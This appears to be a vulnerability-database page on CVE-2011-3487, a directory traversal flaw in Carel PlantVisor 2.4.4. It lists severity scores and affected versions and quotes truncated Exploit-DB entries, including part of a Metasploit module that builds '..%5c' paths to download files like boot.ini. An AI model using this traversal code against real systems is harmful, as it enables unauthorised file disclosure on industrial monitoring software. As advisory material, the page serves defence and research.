CVE-2011-3487
published 2011-09-16CVE-2011-3487: Directory traversal vulnerability in CarelDataServer.exe in Carel PlantVisor 2.4.4 and earlier allows remote attackers to read arbitrary files via a .. (dot…
PriorityP342medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
7.43%
93.7th percentile
Directory traversal vulnerability in CarelDataServer.exe in Carel PlantVisor 2.4.4 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| carel | plantvisor | <= 2.4.4 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)
exploitdb·2017-09-13
CVE-2011-3487 Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)
Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)
---
require 'msf/core'
class MetasploitModule 'Carel Pl@ntVisor Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability
found in Carel Pl@ntVisor [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3487' ],
[ 'BID', '49601' ],
],
'DisclosureDate' => 'Jun 29 2012'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(80)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("..%5c" * depth)
res = send_request_raw({
'method' => 'GET',
'ur
Exploit-DB
Carel PlantVisor 2.4.4 - Directory Traversal
exploitdb·2011-09-13
CVE-2011-3487 Carel PlantVisor 2.4.4 - Directory Traversal
Carel PlantVisor 2.4.4 - Directory Traversal
---
#######################################################################
Luigi Auriemma
Application: Carel PlantVisor
http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=310
Versions: <= 2.4.4
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
1) Introduction
From vendor's homepage:
"PlantVisor Enhanced is monitoring and telemaintenance software for
refrigeration and air-conditioning systems controlled by CAREL
instruments."
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/plantvisor_1-adv.txthttp://securityreason.com/securityalert/8384https://exchange.xforce.ibmcloud.com/vulnerabilities/69762https://www.exploit-db.com/exploits/42706/http://aluigi.altervista.org/adv/plantvisor_1-adv.txthttp://securityreason.com/securityalert/8384https://exchange.xforce.ibmcloud.com/vulnerabilities/69762https://www.exploit-db.com/exploits/42706/
2011-09-16
Published